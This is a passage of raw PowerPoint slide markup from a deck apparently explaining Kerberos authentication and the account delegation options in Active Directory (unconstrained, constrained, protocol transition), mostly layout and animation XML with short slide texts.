        </mc:Fallback>
      </mc:AlternateContent>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Title 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Session Key Distribution Solution</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Text Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="16"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="389675" y="869573"/>
            <a:ext cx="8349647" cy="276999"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Overview of the Kerberos Protocol</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="382309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Account Delegation Settings </a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="15"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="395536" y="1212428"/>
            <a:ext cx="3888432" cy="5024884"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Delegation Tab Options:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Per Default an account is not trusted for delegation – „Do not trust this user for delegation“</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Unconstrained Delegation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Constrained Delegation – Service-for-User-to-Proxy (S4U2proxy)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Protocol Transition – Service-for-User-to-Self (S4U2self)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Option 3 or 4 require to specify target account(s) and selecting the according Service Type (SPN) registered there</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="de-DE" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Kerberos Delegation</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE"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6692" y="476672"/>
            <a:ext cx="4433161" cy="5133684"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4716016" y="1428750"/>
            <a:ext cx="2084834" cy="226993"/>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7" name="Rectangle 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4932040" y="2041368"/>
            <a:ext cx="2084834" cy="195898"/>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de-DE" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rectangle 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4932040" y="2263633"/>
            <a:ext cx="2084834" cy="197583"/>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dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Rectangle 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4716016" y="1674520"/>
            <a:ext cx="3168352" cy="195898"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="7030A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de-DE" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="75828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iterate type="lt">
                                    <p:tmAbs val="25"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr override="childStyle">
                                        <p:cTn id="6" dur="indefinite"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3">
                                            <p:txEl>
                                              <p:pRg st="1" end="1"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.fontWeight</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="bold"/>
                                      </p:to>
                                    </p:set>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="7" presetID="19" presetClass="emph" presetSubtype="0" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="lt">
                                    <p:tmPct val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:animClr clrSpc="rgb" dir="cw">
                                      <p:cBhvr override="childStyle">
                                        <p:cTn id="8" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3">
                                            <p:txEl>
                                              <p:pRg st="1" end="1"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.color</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <a:srgbClr val="F78552"/>
                                      </p:to>
                                    </p:animClr>
                                    <p:animClr clrSpc="rgb" dir="cw">
                                      <p:cBhvr>
                                        <p:cTn id="9" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3">
                                            <p:txEl>
                                              <p:pRg st="1" end="1"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>fillcolor</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <a:srgbClr val="F78552"/>
                                      </p:to>
                                    </p:animClr>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="10" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3">
                                            <p:txEl>
                                              <p:pRg st="1" end="1"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>fill.type</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="solid"/>
                                      </p:to>
                                    </p:set>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="11" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3">
                                            <p:txEl>
                                              <p:pRg st="1" end="1"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>fill.on</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="true"/>
                                      </p:to>
                                    </p:se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9" presetClass="emph" presetSubtype="0" fill="hold" nodeType="clickEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="lt">
                                    <p:tmPct val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:animClr clrSpc="rgb" dir="cw">
                                      <p:cBhvr override="childStyle">
                                        <p:cTn id="18" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3">
                                            <p:txEl>
                                              <p:pRg st="2" end="2"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.color</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <a:srgbClr val="990099"/>
                                      </p:to>
                                    </p:animClr>
                                    <p:animClr clrSpc="rgb" dir="cw">
                                      <p:cBhvr>
                                        <p:cTn id="19" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3">
                                            <p:txEl>
                                              <p:pRg st="2" end="2"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>fillcolor</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <a:srgbClr val="990099"/>
                                      </p:to>
                                    </p:animClr>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="20" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3">
                                            <p:txEl>
                                              <p:pRg st="2" end="2"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>fill.type</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="solid"/>
                                      </p:to>
                                    </p:set>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="21" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3">
                                            <p:txEl>
                                              <p:pRg st="2" end="2"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>fill.on</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="true"/>
                                      </p:to>
                                    </p:set>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="22" presetID="15" presetClass="emph" presetSubtype="0" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="lt">
                                    <p:tmAbs val="25"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr override="childStyle">
                                        <p:cTn id="23" dur="indefinite"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3">
                                            <p:txEl>
                                              <p:pRg st="2" end="2"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.fontWeight</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="bold"/>
                                      </p:to>
                                    </p:se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9" presetClass="emph" presetSubtype="0" fill="hold" nodeType="clickEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="lt">
                                    <p:tmPct val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:animClr clrSpc="rgb" dir="cw">
                                      <p:cBhvr override="childStyle">
                                        <p:cTn id="30" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3">
                                            <p:txEl>
                                              <p:pRg st="3" end="3"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.color</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <a:srgbClr val="5B792B"/>
                                      </p:to>
                                    </p:animClr>
                                    <p:animClr clrSpc="rgb" dir="cw">
                                      <p:cBhvr>
                                        <p:cTn id="31" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3">
                                            <p:txEl>
                                              <p:pRg st="3" end="3"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>fillcolor</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <a:srgbClr val="5B792B"/>
                                      </p:to>
                                    </p:animClr>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="32" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3">
                                            <p:txEl>
                                              <p:pRg st="3" end="3"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>fill.type</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="solid"/>
                                      </p:to>
                                    </p:set>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="33" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3">
                                            <p:txEl>
                                              <p:pRg st="3" end="3"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>fill.on</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="true"/>
                                      </p:to>
                                    </p:set>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="34" presetID="15" presetClass="emph" presetSubtype="0" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="lt">
                                    <p:tmAbs val="25"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr override="childStyle">
                                        <p:cTn id="35" dur="indefinite"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3">
                                            <p:txEl>
                                              <p:pRg st="3" end="3"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.fontWeight</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="bold"/>
                                      </p:to>
                                    </p:se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9" presetClass="emph" presetSubtype="0" fill="hold" nodeType="clickEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="lt">
                                    <p:tmPct val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:animClr clrSpc="rgb" dir="cw">
                                      <p:cBhvr override="childStyle">
                                        <p:cTn id="42" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3">
                                            <p:txEl>
                                              <p:pRg st="4" end="4"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.color</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <a:srgbClr val="2F6DA6"/>
                                      </p:to>
                                    </p:animClr>
                                    <p:animClr clrSpc="rgb" dir="cw">
                                      <p:cBhvr>
                                        <p:cTn id="43" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3">
                                            <p:txEl>
                                              <p:pRg st="4" end="4"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>fillcolor</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <a:srgbClr val="2F6DA6"/>
                                      </p:to>
                                    </p:animClr>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="44" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3">
                                            <p:txEl>
                                              <p:pRg st="4" end="4"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>fill.type</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="solid"/>
                                      </p:to>
                                    </p:set>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="45" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3">
                                            <p:txEl>
                                              <p:pRg st="4" end="4"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>fill.on</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="true"/>
                                      </p:to>
                                    </p:set>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="46" presetID="15" presetClass="emph" presetSubtype="0" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="lt">
                                    <p:tmAbs val="25"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr override="childStyle">
                                        <p:cTn id="47" dur="indefinite"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3">
                                            <p:txEl>
                                              <p:pRg st="4" end="4"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.fontWeight</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="bold"/>
                                      </p:to>
                                    </p:set>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="48" presetID="10"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Account Delegation Settings </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="15"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="395536" y="1212428"/>
            <a:ext cx="5707148" cy="307777"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Required account settings to enable delegation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Kerberos Delegation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="TextBox 16"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-712842" y="7112285"/>
            <a:ext cx="3016039" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="1" defTabSz="914363">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ln w="3175">
                  <a:noFill/>
                </a:ln>
                <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" pitchFamily="34" charset="0"/>
                <a:cs typeface="Verdana" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Client’s TGT “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:ln w="3175">
                  <a:noFill/>
                </a:ln>
                <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" pitchFamily="34" charset="0"/>
                <a:cs typeface="Verdana" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Forwardable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:ln w="3175">
                  <a:noFill/>
                </a:ln>
                <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" pitchFamily="34" charset="0"/>
                <a:cs typeface="Verdana" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>” </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="Right Arrow 19"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2057864" y="1613707"/>
            <a:ext cx="4818392" cy="25120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dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="29" name="Group 28"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="923044" y="1527149"/>
            <a:ext cx="898003" cy="959478"/>
            <a:chOff x="929658" y="1670573"/>
            <a:chExt cx="898003" cy="959478"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="18" name="TextBox 17"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="929658" y="2322274"/>
              <a:ext cx="898003" cy="307777"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr defTabSz="914363">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1400" dirty="0">
                  <a:ln w="3175">
                    <a:noFill/>
                  </a:ln>
                  <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Verdana" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Verdana" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>John Doe</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="21" name="Picture 7" descr="C:\Users\tokikuch\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\R1BJ3OPG\MC900434888[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151" y="1670573"/>
              <a:ext cx="716280" cy="7162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6891064" y="1003723"/>
            <a:ext cx="1284762" cy="1664325"/>
            <a:chOff x="6374811" y="783776"/>
            <a:chExt cx="1284762" cy="1664325"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="19" name="TextBox 18"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6802511" y="2140324"/>
              <a:ext cx="556563" cy="307777"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr defTabSz="914363">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1400" dirty="0">
                  <a:ln w="3175">
                    <a:noFill/>
                  </a:ln>
                  <a:latin typeface="Segoe UI Light" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Verdana" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Verdana" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>APP1</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="22" name="Group 21"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="6374811" y="783776"/>
              <a:ext cx="1284762" cy="1388898"/>
              <a:chOff x="3673924" y="1317558"/>
              <a:chExt cx="1284762" cy="1388898"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="23" name="Picture 22" descr="server.emf"/>
              <p:cNvPicPr>
                <a:picLocks noChangeAspect="1"/>
              </p:cNvPicPr>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId4"/>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="4086682" y="1317558"/>
                <a:ext cx="717771" cy="1071570"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="24" name="Picture 22" descr="Blue Embossed Cylinder"/>
              <p:cNvPicPr>
                <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
              </p:cNvPicPr>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId5" cstate="print"/>
              <a:srcRect/>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4409304" y="1970208"/>
                <a:ext cx="549382" cy="721821"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="9525">
                <a:noFill/>
                <a:miter lim="800000"/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
          </p:pic>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="25" name="Picture 24" descr="D:\Aeshen\TechNet 2006\12-December\Msft-longhorn-papers\TDM Deck\Windows Illustration Icons\Internet.png"/>
              <p:cNvPicPr>
                <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
              </p:cNvPicPr>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId6" cstate="print"/>
              <a:srcRect/>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3894489" y="2100706"/>
                <a:ext cx="571505" cy="571504"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
            </p:spPr>
          </p:pic>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="26" name="Group 25"/>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="3673924" y="2420704"/>
                <a:ext cx="469448" cy="285752"/>
                <a:chOff x="3673924" y="2420704"/>
                <a:chExt cx="469448" cy="285752"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="27" name="Flowchart: Preparation 26"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="3673924" y="2420704"/>
                  <a:ext cx="428628" cy="285752"/>
                </a:xfrm>
                <a:prstGeom prst="flowChartPreparatio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00" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="tx1"/>
                    </a:solidFill>
                    <a:latin typeface="Segoe"/>
                  </a:endParaRPr>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="28" name="TextBox 27"/>
                <p:cNvSpPr txBox="1"/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="3690252" y="2453360"/>
                  <a:ext cx="453120" cy="246221"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom>
                <a:noFill/>
              </p:spPr>
              <p:txBody>
